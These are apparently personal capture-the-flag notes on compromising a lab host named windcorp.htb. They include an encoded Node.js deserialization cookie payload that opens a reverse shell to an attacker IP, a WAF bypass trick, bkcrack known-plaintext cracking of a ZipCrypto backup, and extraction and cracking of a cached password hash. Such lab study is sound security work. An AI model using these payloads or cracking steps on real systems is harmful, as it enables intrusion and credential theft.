22 and 80 to begin with, subdomain portal.windcorp.htb
admin:admin, theres a waf though. also seems like u can deserialize
https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/
bypass is cookie=base64payload=normalcookie
profile=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2VjaG8gYzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRBdU1UQXVNVFl1TVRVdk5EUTBOQ0F3UGlZeCB8IGJhc2U2NCAtZCB8IGJhc2gnLCBmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpIHsgY29uc29sZS5sb2coc3Rkb3V0KSB9KTt9KCkifQ===eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2Nzg5Mjk0ODQ2NjZ9
we can just make any web request and when the cookie is desrialized (to show our user on /) it will execute
there is a backup.zip
7z l -slt
shows that it has sssd bullshit and some files have ZipCrypto Store
https://www.anter.dev/posts/plaintext-attack-zipcrypto/
Store is uncompressed and is actually crackable. I’ll find the largest readable file
./bkcrack -L ../backup.zip | grep Store
cat /var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
###
[libdefaults]
udp_preference_limit = 0
###
./bkcrack -C ../backup.zip -c 'var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults' -p ../krb5_libdefaults
[19:52:46] Keys
d6829d8d 8514ff97 afc3f825
now lets clone the archive with a useable pass
./bkcrack -C ../backup.zip -k d6829d8d 8514ff97 afc3f825 -U bruh.zip easy
lets look for the cachedpassword
strings ./var/lib/sss/db/cache_windcorp.htb.ldb
⇒ [email protected]
, pantera
(after cracking with mode 1800)
put our publickey into webster and dynamic forward now
bruh
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos-sec
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp closed wsman